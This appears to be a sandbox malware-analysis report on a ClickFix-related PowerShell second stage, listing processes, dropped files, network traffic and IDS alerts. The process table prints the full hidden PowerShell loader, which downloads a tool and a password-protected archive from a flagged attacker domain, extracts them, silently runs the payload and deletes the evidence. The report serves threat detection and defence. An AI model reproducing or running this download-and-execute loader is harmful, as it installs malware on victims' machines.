| File name: | powershell_stage2.ps1 |
| Full analysis: | https://app.any.run/tasks/47887b1e-a16c-4957-80cf-1e1a19267d58 |
| Verdict: | Malicious activity |
| Threats: | ClickFix is a sophisticated social engineering technique that tricks users into manually executing malicious commands on their devices. It masquerades as a "quick fix" for fake technical issues, CAPTCHA verifications, or error messages, often hijacking the clipboard to paste harmful PowerShell or terminal commands. This user-assisted approach helps it bypass traditional security controls, leading to infostealers like Lumma Stealer, RATs, and other malware. |
| Analysis date: | May 07, 2026, 07:45:03 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (1967), with no line terminators |
| MD5: | 6E898825BF44CF00F5C2C9910C6CAF90 |
| SHA1: | FA2C78A2DF3F4A79B49ED8D6C50C66AE2743D5C4 |
| SHA256: | 17679BB632DABA38CE441A30B4C5DA8A83B307F23505A4A035E0200ECB2E71E6 |
| SSDEEP: | 48:YSc4oOIa/8d2I/X8crXl6pkqrFVqY3S7NS7nXLGduEuve8Rssn:Rc9OcUpcDIkKFVNCQraE |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1824 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2232 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2652 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\powershell_stage2.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6884 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 8164 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command [System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProtocolType]::Tls12;$g7='7z';$h8='P6xHzFbMdK';$i9=Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName());New-Item -ItemType Directory -Path $i9 -Force|Out-Null;$j10=Join-Path $i9 ([System.IO.Path]::GetRandomFileName()+'.exe');$k11=Join-Path $i9 ([System.IO.Path]::GetRandomFileName()+'.'+$g7);$l12=0;for($m13=0;$m13 -lt 3 -and -not $l12;$m13++){try{if(-not (Test-Path $j10)){Invoke-WebRequest -Uri 'https://best-claudns-js.beer/api/7z.exe' -OutFile $j10 -UseBasicParsing}Invoke-WebRequest -Uri 'https://best-claudns-js.beer/api/index.php?a=dl&token=3affb192292e872200f5763d6340f0426f45a4210e82287e5cb204904fc3dc9f&src=cloudflare&cb=test&ref=&mode=download' -OutFile $k11 -UseBasicParsing;if(Test-Path $k11){$l12=1}else{Start-Sleep -Seconds 2}}catch{Start-Sleep -Seconds 2}};if(-not (Test-Path $k11)){exit};$n14=Join-Path $i9 ([System.IO.Path]::GetRandomFileName());New-Item -ItemType Directory -Path $n14 -Force|Out-Null;$o15=@('x','-y');if($h8 -ne ''){$o15+=('-p'+$h8)}$o15+=('-o'+$n14);$o15+=$k11;if(Test-Path $j10){& $j10 @o15|Out-Null}else{Start-Process -FilePath $k11 -WindowStyle Hidden};$p16=Get-ChildItem -Path $n14 -Filter *.exe -Recurse -File|Select-Object -First 1;$q17=Get-ChildItem -Path $n14 -Filter *.msi -Recurse -File|Select-Object -First 1;$r18=$null;$s19=$null;if($p16){$r18=$p16.FullName;$s19=$p16.Directory.FullName}elseif($q17){$r18=$q17.FullName;$s19=$q17.Directory.FullName}else{$r18=$k11};if($r18){if($s19){Start-Process -FilePath $r18 -WorkingDirectory $s19 -WindowStyle Hidden}else{Start-Process -FilePath $r18 -WindowStyle Hidden}};try{Remove-Item -LiteralPath $k11 -Force -ErrorAction SilentlyContinue}catch{};try{if(Test-Path $j10){Remove-Item -LiteralPath $j10 -Force -ErrorAction SilentlyContinue}}catch{}; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2652 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:4B226DCB6D10A1E4B98687D3E6928D2D | SHA256:2D6100825B61810B032FBA81E9DC7B85AF43D00B8154B2D8C5F149CD37EE9C93 | |||
| 2652 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kvvhhwu1.2zc.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 8164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hyhou2gk.eg5.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2652 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFdfe46.TMP | binary | |
MD5:00A03B286E6E0EBFF8D9C492365D5EC2 | SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615 | |||
| 2652 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TO22EP38MEIPF6HMZQFT.temp | binary | |
MD5:B89813D18517418F16C3809E109D1E90 | SHA256:14F036F923D7B2B5CEE0101EF189990B1E59193745D5916E7E5C8942022EBBA1 | |||
| 2652 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:B89813D18517418F16C3809E109D1E90 | SHA256:14F036F923D7B2B5CEE0101EF189990B1E59193745D5916E7E5C8942022EBBA1 | |||
| 2652 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_y4gnorc3.pmv.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 8164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\xopdu51i.e4s\msama2df.e1k.exe | executable | |
MD5:E96E28B3824ABF6496FD0971B3BA7459 | SHA256:26817725650583D99CA3E617A618DD75C0F71BD316B5761780B7361F5F824CAD | |||
| 8164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xdxq54tv.3xg.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3448 | svchost.exe | GET | 304 | 40.127.240.158:443 | https://settings-win.data.microsoft.com/settings/v3.0/WSD/UpdateHealthTools?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=s:BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&sampleId=s:95271487&appVer=10.0.19041.3626&FlightRing=Retail&TelemetryLevel=1&HidOverGattReg=C%3A%5CWINDOWS%5CSystem32%5CDriverStore%5CFileRepository%5Chidbthle.inf_amd64_9610b4821fdf82a5%5CMicrosoft.Bluetooth.Profiles.HidOverGatt.dll&AppVer=&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&OEMModel=DELL&UpdateOfferedDays=4294967295&ProcessorManufacturer=AuthenticAMD&InstallDate=1661339444&OEMModelBaseBoard=&BranchReadinessLevel=CB&OEMSubModel=J5CR&IsCloudDomainJoined=0&DeferFeatureUpdatePeriodInDays=30&IsDeviceRetailDemo=0&FlightingBranchName=&OSUILocale=en-US&DeviceFamily=Windows.Desktop&WuClientVer=10.0.19041.3996&UninstallActive=1&IsFlightingEnabled=0&OSSkuId=48&ProcessorClockSpeed=3094&TotalPhysicalRAM=6144&SecureBootCapable=0&App=SedimentPack&ProcessorCores=6&CurrentBranch=vb_release&InstallLanguage=en-US&DeferQualityUpdatePeriodInDays=0&OEMName_Uncleaned=DELL&TPMVersion=0&PrimaryDiskTotalCapacity=262144&InstallationType=Client&AttrDataVer=186&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&IsEdgeWithChromiumInstalled=1&OSVersion=10.0.19045.4046&IsMDMEnrolled=0&ActivationChannel=Retail&FirmwareVersion=A.40&TrendInstalledKey=1&OSArchitecture=AMD64&DefaultUserRegion=244&UpdateManagementGroup=2 | US | — | — | whitelisted |
4336 | SIHClient.exe | GET | 304 | 74.178.240.61:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | US | — | — | whitelisted |
4336 | SIHClient.exe | GET | 200 | 20.165.94.54:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | US | — | — | whitelisted |
4336 | SIHClient.exe | GET | 200 | 74.178.240.61:443 | https://slscr.update.microsoft.com/sls/ping | US | — | — | whitelisted |
4336 | SIHClient.exe | GET | 304 | 74.178.240.61:443 | https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | US | — | — | whitelisted |
5316 | svchost.exe | GET | 200 | 23.11.40.157:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAz1vQYrVgL0erhQLCPM8GY%3D | NL | binary | 471 b | whitelisted |
8164 | powershell.exe | GET | 200 | 178.16.52.101:443 | https://best-claudns-js.beer/api/7z.exe | SC | executable | 838 Kb | unknown |
5276 | MoUsoCoreWorker.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | US | binary | 814 b | whitelisted |
5276 | MoUsoCoreWorker.exe | GET | 200 | 2.16.241.19:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted |
5316 | svchost.exe | POST | 400 | 20.190.160.22:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 204 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3448 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4 | System | 192.168.100.255:137 | — | Not routed | — | whitelisted |
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5276 | MoUsoCoreWorker.exe | 2.16.241.19:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted |
5276 | MoUsoCoreWorker.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | US | whitelisted |
— | — | 48.192.1.65:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4 | System | 192.168.100.255:138 | — | Not routed | — | whitelisted |
8164 | powershell.exe | 178.16.52.101:443 | best-claudns-js.beer | OMEGATECH-AS | SC | malicious |
3428 | svchost.exe | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5316 | svchost.exe | 20.190.160.22:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
best-claudns-js.beer |
| malicious |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
8164 | powershell.exe | Misc activity | INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET) |
8164 | powershell.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 36 |
2232 | svchost.exe | Possible Social Engineering Attempted | PHISHING [ANY.RUN] ClickFix related domain (best-claudns-js .beer) |
8164 | powershell.exe | Possible Social Engineering Attempted | PHISHING [ANY.RUN] ClickFix related IP address |
8164 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
8164 | powershell.exe | Misc activity | ET INFO Request for EXE via Powershell |
8164 | powershell.exe | Possible Social Engineering Attempted | PHISHING [ANY.RUN] ClickFix Related URL Pattern (/api/index.php?a=dl&token=<HEX>{64}) |
8164 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
8164 | powershell.exe | Possible Social Engineering Attempted | PHISHING [ANY.RUN] ClickFix Related URL Pattern (/api/index.php?a=dl&token=<HEX>{64}) |
8164 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |